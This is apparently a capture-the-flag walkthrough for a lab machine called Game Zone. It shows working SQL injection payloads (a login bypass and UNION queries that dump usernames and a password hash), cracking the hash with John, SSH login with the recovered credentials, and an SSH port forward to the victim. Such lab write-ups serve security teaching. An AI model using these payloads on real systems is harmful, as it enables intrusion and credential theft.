Skip to main content

Game Zone [SQLi]

Manual SQLi

  • Page: [IP:80]
  • Bypassing the Login Portal: ' OR 1=1;--
┌────────────┬───────────────────────────────────────────────────────────────────────────┐
| Login:     | OR 1=1;--                                                                 |
|────────────|───────────────────────────────────────────────────────────────────────────|
| Password:  | ************                                                              |
└────────────┴───────────────────────────────────────────────────────────────────────────┘
  • Page: [IP:80/portal.php]
  • After the Login we get Presented with a Search Field that allows us to Search for different Movies.
  • To Discover an Error-Based SQL Injection we need to break the code's SQL Query by trying certain characters until an Error Message is produced.
  • Using: ' in the Search Field
┌────────────┬───────────────────────────────────────────────────────────────────────────┐
| Search:    | '                                                                         |
|────────────|───────────────────────────────────────────────────────────────────────────|
| Response:  | You have an Error in your SQL Syntax;                                     |
└────────────┴───────────────────────────────────────────────────────────────────────────┘
  • Searching for the Correct Number of Columns: ' UNION SELECT 1-- -
┌────────────┬───────────────────────────────────────────────────────────────────────────┐
| Search:    | UNION SELECT 1-- -                                                        |
|────────────|───────────────────────────────────────────────────────────────────────────|
| Response:  | The used SELECT statements have a different Number of Columns             |               
└────────────┴───────────────────────────────────────────────────────────────────────────┘
  • The Error Disappeared: ' UNION SELECT 1,2,3-- - . Correct Number of Columns: 3
┌────────────┬───────────────────────────────────────────────────────────────────────────┐
| Search:    | UNION SELECT 1,2,3-- -                                                    |
|────────────|───────────────────────────────────┬───────────────────────────────────────|
| Response:  | 2                                 | 3                                     |           
└────────────┴───────────────────────────────────┴───────────────────────────────────────┘
  • Using INFORMATION_SCHEMA.tables which provides Information about all of the Tables.
  • ' UNION SELECT 1,table_schema,table_name FROM information_schema.tables-- -
┌────────────┬───────────────────────────────────────────────────────────────────────────┐
| Search:    | UNION SELECT 1,table_schema,table_name FROM information_schema.tables-- - |       
|────────────|───────────────────────────────────┬───────────────────────────────────────|
| Response:  | db                                | post                                  |
|            | db                                | users                                 |   
└────────────┴───────────────────────────────────┴───────────────────────────────────────┘
  • Using INFORMATION_SCHEMA.columns which Returns all the Tables and Columns Names.
  • ' UNION SELECT 1,table_name,column_name FROM information_schema.columns-- -
┌────────────┬───────────────────────────────────────────────────────────────────────────┐
| Search:    | UNION SELECT 1,table_name,column_name FROM information_schema.columns-- - |       
|────────────|───────────────────────────────────┬───────────────────────────────────────|
| Response:  | users                             | username                              |
|            | users                             | pwd                                   |   
└────────────┴───────────────────────────────────┴───────────────────────────────────────┘
  • ' UNION SELECT 1, username, pwd FROM users-- -
┌────────────┬───────────────────────────────────────────────────────────────────────────┐
| Search:    | UNION SELECT 1, username, pwd FROM users-- -                              |
|────────────|───────────────────────────────────────────────────────────────────────────|
| USERNAME   | PWD                                                                       |
|────────────|───────────────────────────────────────────────────────────────────────────|
| agent47    | ab5db915fc9cea6c78df88106c6500c57f2b52901ca6c0c6218f04122c3efd14          |
└────────────┴───────────────────────────────────────────────────────────────────────────┘

JOHN

  • We can Brute-Force the HASH using John
  • Password: videogamer124
Loaded 1 password hash (gost, GOST R 34.11-94 [64/64])
videogamer124    (?)
ab5db915fc9cea6c78df88106c6500c57f2b52901ca6c0c6218f04122c3efd14 >> videogamer124

SSH Tunneling

  • Using SSH Credentials to Login: agent47:videogamer124
agent47@gamezone:~$ id
uid=1000(agent47) gid=1000(agent47) groups=1000(agent47),4(adm),24(cdrom),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)

  • The Port: 10000/TCP is listening for upcoming Connections.
agent47@gamezone:~$ netstat -tunlp
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -               
tcp        0      0 0.0.0.0:10000           0.0.0.0:*               LISTEN      -               
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -               
tcp6       0      0 :::80                   :::*                    LISTEN      -               
tcp6       0      0 :::22                   :::*                    LISTEN      -               
udp        0      0 0.0.0.0:68              0.0.0.0:*                           -          
udp        0      0 0.0.0.0:10000           0.0.0.0:*                           -

  • SSH Tunneling from the Server Machine to the Client Machine.
attacker@machine:~$ ssh -L 10000:localhost:10000 agent47@VICTIM_IP